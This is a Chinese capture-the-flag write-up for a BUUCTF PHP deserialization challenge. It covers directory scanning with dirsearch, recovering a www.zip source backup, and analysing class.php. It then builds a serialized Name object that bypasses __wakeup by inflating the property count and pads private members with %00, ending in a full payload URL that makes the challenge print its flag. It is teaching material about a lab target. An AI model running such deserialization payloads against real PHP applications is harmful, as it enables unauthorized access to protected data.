知识点

  • 目录扫描
  • 反序列化
  • wakeup魔术方法

public、protected与private在序列化时的区别

  • public(公共的):在本类内部、外部类、子类都可以访问
  • protect(受保护的):只有本类或子类或父类中可以访问
  • private(私人的):只有本类内部可以使用

private属性序列化的时候格式是 %00类名%00成员名
protected属性序列化的时候格式是 %00*%00成员名

注意:当有 protected 和 private 属性的时候记得补齐空的字符串

启动靶机

1. 打开题目

打开题目,提示网站有备份
image.png

2. dirsearch扫描

用dirsearch扫描,有很多很多文件,但都不能访问,只有www.zip可以下载

  1. python3 dirsearch.py -u http://af22714f-20fc-4d72-ace4-6c78acf89fcb.node4.buuoj.cn:81/

image.png

3. 分析源码

下载之后得到5个文件,flag中放了一个假的flag
image.png
打开index.php,发现加载了class.php
image.png
于是打开class.php,代码如下

  1. <?php
  2. include 'flag.php';
  3. error_reporting(0);
  4. class Name{
  5. private $username = 'nonono';
  6. private $password = 'yesyes';
  7. public function __construct($username,$password){
  8. $this->username = $username;
  9. $this->password = $password;
  10. }
  11. function __wakeup(){
  12. $this->username = 'guest';
  13. }
  14. function __destruct(){
  15. if ($this->password != 100) {
  16. echo "</br>NO!!!hacker!!!</br>";
  17. echo "You name is: ";
  18. echo $this->username;echo "</br>";
  19. echo "You password is: ";
  20. echo $this->password;echo "</br>";
  21. die();
  22. }
  23. if ($this->username === 'admin') {
  24. global $flag;
  25. echo $flag;
  26. }else{
  27. echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
  28. die();
  29. }
  30. }
  31. }
  32. ?>

4. 构造序列化

根据class.php,构造序列化内容,如下:

  1. <?php
  2. class Name{
  3. private $username = 'admin';
  4. private $password = '100';
  5. public function __construct($username,$password){
  6. $this->username = $username;
  7. $this->password = $password;
  8. }
  9. }
  10. $select = new Name('admin',100);
  11. echo serialize($select);
  12. ?>
  13. //输出:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

5. 绕过__wakeup

在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数执行。
因此我们将序列化这样设置:

  1. O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

6. private

private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。因此payload为:

  1. O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

7. 最终payload

  1. http://af22714f-20fc-4d72-ace4-6c78acf89fcb.node4.buuoj.cn:81/index.php?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

得到flag
image.png